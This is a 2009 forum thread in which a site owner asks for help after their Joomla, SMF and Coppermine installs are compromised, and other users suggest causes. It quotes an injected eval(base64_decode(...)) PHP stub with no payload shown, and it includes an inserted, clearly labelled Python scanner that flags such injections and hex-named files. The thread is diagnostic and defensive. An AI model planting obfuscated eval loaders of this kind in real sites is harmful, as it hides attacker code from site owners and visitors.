Digital Point Forums

#1
Feb 15th 2009, 1:37 am
cafecommk
Grunt
Join Date: Aug 2007
Location: Macedonia
Posts: 48
My account was hacked

I have an account with Bluehost and have been happy with them so far.
I was running Joomla, SMF 1.1.2, Coppermine and a few other scripts.
Some of them I probably did not upgrade on time. I started having problems and now I am fixing things. In all my PHP folders I found code that is not mine. I want to post it here; hopefully someone will know what to do.
/**/eval(base64_decode('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')); ?> and similar.
This one I found in Coppermine; similar code I cleaned from SMF, and I installed a new Joomla 1.5.9 and am hoping it is clean.

Other than that, in time new folders appeared that are not mine, and many files with names like 1fb3de05033ccbda364186dfb7d697d9. I attached one of them.

Yesterday... I had a professional help me fix my SMF and we worked the whole day... and at the end somehow it returned everything to how it was in the first place. I wanted to shoot myself. I felt miserable for taking his time and not being able to fix my problems.

Is it possible that someone has control over my account? And how can I stop it?

Thank You all for reading.
Thank You more if anyone can help.

Edit: any links where I can look for help are welcome.
Attached Files
File Type: zip 1fb44832feac80438d2ee3c20401f745.zip (20.7 KB, 39 views)
__________________
Learn Fast = Earn Fast

Last edited by cafecommk; Feb 15th 2009 at 2:36 am.

#2
Feb 15th 2009, 2:40 am
ads2help
WP Theme Designer
Join Date: Sep 2008
Location: DP
Posts: 1,835
Do you run any other scripts that were written by you or someone else that you hired?

#3
Feb 15th 2009, 3:59 am
cafecommk
Grunt
Join Date: Aug 2007
Location: Macedonia
Posts: 48
Other scripts, maybe like chat or list or similar, but nothing of mine.
I really want to find out what and who is messing with me.
__________________
Learn Fast = Earn Fast

#4
Feb 15th 2009, 5:31 am
kailash
of the Nightfall
Join Date: Feb 2007
Location: twitter.com/webhosttalk
Posts: 1,220
This is encrypted JavaScript code, and I believe all your index pages have this code. IFrame and JavaScript hacking is now a common way to inject code in pages. There are many reasons behind it. Some of them are as follows:

- Your FTP password is compromised.
- Your system is infected with spyware/worm/virus/trojan.
- Server is rooted.
- Insecure script in your domain through which they can inject the code (i.e. SQL injection)

Kailash
__________________
WebHosting Talk & Help | cPanel/WHM Configuration
PHPbb, Joomla, Wordpress, SMF and other third party scripts - For Installation PM me

#5
Feb 15th 2009, 5:45 am
cafecommk
Grunt
Join Date: Aug 2007
Location: Macedonia
Posts: 48
Thank you, Kailash. Can you direct me to solutions, or where can I learn more on how to check/fix things?
- I changed all my passwords
- Do you know of any scanner for online folders?
- This is probably not up to me but the host
- I guess this is the worst... I have no idea how to clean up
__________________
Learn Fast = Earn Fast

#6
Feb 15th 2009, 8:34 pm
kailash
of the Nightfall
Join Date: Feb 2007
Location: twitter.com/webhosttalk
Posts: 1,220
Unfortunately, I am not sure about the root cause of this issue and hence there is no proper solution for it. But to prevent this, the host should secure the server, and sometimes a small security hole can create a problem.

Also, there is a long discussion at the cPanel forum for this issue: http://forums.cpanel.net/showthread.php?t=62821

This is not the issue with cPanel servers, but it is also seen on Plesk and DirectAdmin servers too. I am not aware of any scanner to scan the files only.

Regards,

Kailash
__________________
WebHosting Talk & Help | cPanel/WHM Configuration
PHPbb, Joomla, Wordpress, SMF and other third party scripts - For Installation PM me
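
[Added example, not part of any post in this thread.] A small scanner for the two indicators the original poster describes: the eval(base64_decode('...')) line in PHP files, and files or folders whose name is a bare 32-hex-digit string. It only reads and decodes for review; the webroot, file names and payload built in demo() are constructed sample data.

```python
import base64
import os
import re
import tempfile

# eval(base64_decode('...')) with optional whitespace; group 1 is the payload.
INJECTED = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]*)['\"]", re.I)
# Names that are a bare 32-hex-digit string, like the files in the thread.
HEX_NAME = re.compile(r"^[0-9a-f]{32}$", re.I)

def scan(root):
    """Return sorted (relative_path, reason, detail) findings under root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            if HEX_NAME.match(os.path.splitext(name)[0]):
                rel = os.path.relpath(os.path.join(dirpath, name), root)
                findings.append((rel, "hex-name", ""))
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            for m in INJECTED.finditer(data):
                try:  # decode for review only; the payload is never executed
                    text = base64.b64decode(m.group(1))[:60].decode("latin-1")
                except ValueError:
                    text = "<undecodable>"
                findings.append((os.path.relpath(path, root), "eval-base64", text))
    return sorted(findings)

def demo():
    """Build a constructed sample webroot in a temp directory and scan it."""
    payload = base64.b64encode(b"echo 'constructed sample';").decode()
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "gallery"))
        with open(os.path.join(root, "gallery", "index.php"), "w") as fh:
            fh.write("<?php /**/eval(base64_decode('%s')); ?>\n" % payload)
        with open(os.path.join(root, "clean.php"), "w") as fh:
            fh.write("<?php echo 'hello'; ?>\n")
        open(os.path.join(root, "0123456789abcdef0123456789abcdef"), "w").close()
        return scan(root)

if __name__ == "__main__":
    print("\n".join(" | ".join(f) for f in demo()))
```

Run scan() against a downloaded copy of the account's web folder; every hit is a file to compare against a clean copy of the script it belongs to.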

#7
Feb 15th 2009, 9:06 pm
AndyCrow
Grunt
Join Date: Feb 2009
Posts: 50
There's a possibility that the intruder is using your server as a means of storing programs. You've gotta watch out for that because lots of hackers store their illegal software/scripts/data on servers so that they can access them from anywhere AND disassociate themselves from the particular software or w/e it is that they are storing.

#8
Feb 15th 2009, 9:34 pm
3roken
Champion of the Naaru
Join Date: Oct 2008
Location: [ Melbourne - Australia ] - CBD
Posts: 238
I've sent you a private message regarding your issue.

#9
Feb 16th 2009, 1:17 am
justdoit1
Champion of the Naaru
Join Date: Nov 2007
Posts: 100
I've been afraid of Joomla. Without any web app firewalls, your site is always a victim for attackers.

#10
Feb 26th 2009, 9:50 am
salomaso
Peon
Join Date: Feb 2009
Posts: 17
blin, write to support and this problem must be invise (sorry, me english is bad)
you have 100% chances, because all - mail and etc. you. Imho